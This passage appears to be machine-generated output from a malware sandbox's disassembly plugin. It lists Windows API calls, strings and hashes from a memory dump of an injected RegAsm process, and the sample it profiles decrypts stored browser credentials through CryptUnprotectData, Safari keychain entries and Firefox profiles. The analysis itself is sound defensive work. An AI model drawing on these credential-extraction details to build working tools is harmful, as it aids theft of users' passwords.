                                                                                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                                                                                      • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                      • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Version
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                      • API String ID: 2257402768-1134094380
                                                                                                                                                                      • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                      • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                                                                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                      APIs
                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                      Strings
                                                                                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 829165378-0
                                                                                                                                                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                                                                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                                                                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
